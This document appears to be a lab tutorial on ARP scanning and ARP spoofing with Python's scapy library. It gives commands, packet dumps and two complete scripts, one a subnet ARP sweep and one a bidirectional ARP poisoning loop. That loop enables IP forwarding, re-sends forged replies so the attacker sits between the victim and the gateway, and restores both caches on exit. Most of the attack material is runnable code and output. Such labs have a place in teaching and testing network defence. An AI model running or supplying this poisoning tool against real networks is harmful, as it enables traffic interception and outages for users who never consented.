1. LAN ARP scan
1) Simple implementation (a fuller implementation would wrap this in a function that derives the subnet from the host's own IP address, or loops over a defined IP range):

arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))
Begin emission:
***Finished to send 256 packets.
................................................^C
Received 51 packets, got 3 answers, remaining 253 packets

(pdst='192.168.80.0/24' makes scapy expand the request into 256 frames, one per address. Without a timeout= argument srp() keeps listening until Ctrl-C; a fuller implementation passes timeout= so the call decides for itself when to stop.)

print(arp2[0].show())
0000 Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001 Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether / ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03 says 192.168.80.251 / Padding

(srp() returns a (answered, unanswered) pair; arp2[0] is the list of answered (request, reply) pairs.)

2) Take apart the fields of the reply from 192.168.80.251:

print(arp2[0].res[2][1].fields)
{'src': '00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}

(A fuller implementation would extract the fields automatically. .res[2] is the third (sent, received) pair and [1] selects the received frame. Note that .fields on the frame only returns the outer Ethernet layer: type 2054 is 0x0806, ARP. The ARP fields live in the payload and are reached with .res[2][1][ARP].fields.)

print(arp2[0].res[2][1].show())
###[ Ethernet ]###
  dst= 00:0c:29:e2:bb:15
  src= 00:0c:29:21:fd:03
  type= 0x806
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= is-at
  hwsrc= 00:0c:29:21:fd:03
  psrc= 192.168.80.251
  hwdst= 00:0c:29:e2:bb:15
  pdst= 192.168.80.250
###[ Padding ]###
  load= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

(show() prints the packet and returns None, which is why wrapping it in print() leaves a trailing "None" line.)
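The "fuller implementation" the notes above keep pointing at, as an added example that is not code from the original page: derive the subnet from the interface's own address, give srp() a timeout so it returns on its own, and reduce the answers to an (ip, mac) table. The interface name eth0 and the /24 netmask are assumptions; the addresses are the ones from this page's lab. The send/receive part needs scapy and root; the two helper functions run without either.

```python
"""ARP sweep of the local subnet with a bounded wait (added example)."""
import ipaddress

try:
    # Only the network part needs scapy; the helpers below are pure Python.
    from scapy.all import ARP, Ether, srp, get_if_addr
except ImportError:  # lets local_subnet()/hosts_from_answers() be used without scapy
    ARP = Ether = srp = get_if_addr = None

BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def local_subnet(ip, netmask):
    """Network to sweep, derived from the interface's own address instead of
    hard-coding 192.168.80.0/24 as the page does."""
    return str(ipaddress.IPv4Network(f"{ip}/{netmask}", strict=False))


def hosts_from_answers(answers):
    """Reduce srp() answer pairs to a sorted, de-duplicated (ip, mac) list.

    Only the reply half of each pair is used. scapy resolves rcv.psrc by
    descending into the ARP layer, so any object exposing .psrc/.hwsrc works.
    """
    seen = {}
    for _sent, rcv in answers:
        seen[rcv.psrc] = rcv.hwsrc.lower()
    return sorted(seen.items(), key=lambda kv: ipaddress.IPv4Address(kv[0]))


def arp_scan(iface="eth0", netmask="255.255.255.0", timeout=2):
    """Broadcast one who-has per address and wait at most `timeout` seconds,
    so the call returns by itself instead of needing Ctrl-C (assumed iface)."""
    net = local_subnet(get_if_addr(iface), netmask)
    req = Ether(dst=BROADCAST) / ARP(op=1, hwdst=ZERO_MAC, pdst=net)
    answered, _unanswered = srp(req, iface=iface, timeout=timeout, verbose=False)
    return hosts_from_answers(answered)


if __name__ == "__main__":
    for ip, mac in arp_scan():
        print(f"{ip:<16} {mac}")
```

A host that answers twice (some stacks reply from more than one interface, or a late duplicate arrives) collapses to one row, and the rows come out in address order rather than in the order replies happened to arrive.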

2. ARP spoof (ARP poisoning)
1) Poison host 192.168.80.251 (tell it that the gateway's MAC is the attacker's MAC). Addresses in the lab:
192.168.80.1, MAC 00:50:56:c0:00:08 (gateway)
192.168.80.250, MAC 00:0c:29:e2:bb:15 (attacker)
192.168.80.251, MAC 00:0c:29:21:fd:03 (victim)

arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
arp3.show()
###[ Ethernet ]###
  dst= 00:0c:29:21:fd:03
  src= 00:0c:29:e2:bb:15
  type= 0x806
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= is-at
  hwsrc= 00:0c:29:e2:bb:15
  psrc= 192.168.80.1
  hwdst= 00:0c:29:21:fd:03
  pdst= 192.168.80.251

(Ether src is not set explicitly, so scapy fills in the sending interface's own MAC, the attacker's 00:0c:29:e2:bb:15.)

arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
Begin emission:
Finished to send 1 packets.
....^C
Received 4 packets, got 0 answers, remaining 1 packets

ARP is a layer-2 packet, so it is delivered as long as the destination MAC is correct. 192.168.80.251 receives this ARP reply and, although it never sent a request, takes hwsrc=00:0c:29:e2:bb:15 and psrc=192.168.80.1 from the ARP payload into its ARP cache.

(A forged reply gets no answer, which is why srp() reports 0 answers and has to be stopped with Ctrl-C; sendp() is the right call for a one-way frame. The poisoned entry also expires like any other cache entry, so a real attack re-sends the reply periodically.)

Screenshots:
ARP cache of 192.168.80.251 before poisoning:
ARP cache of 192.168.80.251 after poisoning:

2) Poison the gateway (tell gateway 192.168.80.1 that host 192.168.80.251's MAC is the attacker's MAC):

arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
arp4.show()
###[ Ethernet ]###
  dst= 00:50:56:c0:00:08
  src= 00:0c:29:e2:bb:15
  type= 0x806
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= is-at
  hwsrc= 00:0c:29:e2:bb:15
  psrc= 192.168.80.251
  hwdst= 00:50:56:c0:00:08
  pdst= 192.168.80.1

arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
Begin emission:
Finished to send 1 packets.
........^C
Received 8 packets, got 0 answers, remaining 1 packets

Again, ARP is a layer-2 packet and is delivered as long as the destination MAC is correct. 192.168.80.1 receives this ARP reply and takes hwsrc=00:0c:29:e2:bb:15 and psrc=192.168.80.251 from the ARP payload into its ARP cache (0 answers is expected for a one-way reply). With both sides poisoned, traffic between 192.168.80.251 and the gateway now passes through 192.168.80.250 in both directions; unless the attacker forwards it (net.ipv4.ip_forward=1), the victim simply loses connectivity.

Screenshots:
ARP cache of 192.168.80.1 before poisoning:

ARP cache of 192.168.80.1 after poisoning:
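The two one-off frames above, turned into the loop a practitioner would actually run, as an added example that is not code from the original page: poison both directions with sendp() instead of srp(), re-send before the cache entries expire, enable IP forwarding so the victim keeps connectivity, and send the true mappings back on Ctrl-C so both caches are repaired. The addresses and MACs are this page's lab values; the interface name eth0, the 2 s interval and the sysctl call are assumptions (Linux, root). The field helpers run without scapy; only to_frame() and run() need it.

```python
"""Bidirectional ARP poisoning with re-send and cache restore (added example)."""
import subprocess
import time

try:
    # Only putting frames on the wire needs scapy.
    from scapy.all import ARP, Ether, sendp
except ImportError:  # lets the field helpers be used without scapy installed
    ARP = Ether = sendp = None

# Lab addresses from the page.
GATEWAY_IP, GATEWAY_MAC = "192.168.80.1", "00:50:56:c0:00:08"
ATTACKER_MAC = "00:0c:29:e2:bb:15"
VICTIM_IP, VICTIM_MAC = "192.168.80.251", "00:0c:29:21:fd:03"


def arp_reply_fields(target_ip, target_mac, claimed_ip, claimed_mac):
    """Field values for a unicast is-at reply telling target_ip that
    claimed_ip lives at claimed_mac. The receiver stores only the
    (psrc, hwsrc) pair, which is exactly what we control."""
    return {
        "dst": target_mac, "src": claimed_mac, "op": 2,
        "hwsrc": claimed_mac, "psrc": claimed_ip,
        "hwdst": target_mac, "pdst": target_ip,
    }


def poison_fields():
    """Victim learns gateway -> attacker, gateway learns victim -> attacker."""
    return [
        arp_reply_fields(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, ATTACKER_MAC),
        arp_reply_fields(GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, ATTACKER_MAC),
    ]


def restore_fields():
    """The true mappings, sent on exit so the two hosts can talk again."""
    return [
        arp_reply_fields(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC),
        arp_reply_fields(GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, VICTIM_MAC),
    ]


def to_frame(f):
    """Build the same Ether/ARP frame the page assembles by hand."""
    return Ether(dst=f["dst"], src=f["src"]) / ARP(
        op=f["op"], hwsrc=f["hwsrc"], psrc=f["psrc"],
        hwdst=f["hwdst"], pdst=f["pdst"])


def run(iface="eth0", interval=2.0):
    """Poison until Ctrl-C, then repair both caches (assumed iface/interval)."""
    # Without forwarding, the victim's traffic dies at the attacker: a DoS, not a MITM.
    subprocess.run(["sysctl", "-w", "net.ipv4.ip_forward=1"], check=True)
    frames = [to_frame(f) for f in poison_fields()]
    try:
        while True:
            sendp(frames, iface=iface, verbose=False)  # re-send before entries expire
            time.sleep(interval)
    except KeyboardInterrupt:
        pass
    finally:
        # A few copies of the true mappings, in case one is lost.
        sendp([to_frame(f) for f in restore_fields()],
              iface=iface, count=3, inter=0.5, verbose=False)


if __name__ == "__main__":
    run()
```

The restore step is what separates a test from an outage: once the attacker stops re-sending, the poisoned entries linger until they time out, and the victim and gateway keep addressing each other through a MAC that no longer forwards.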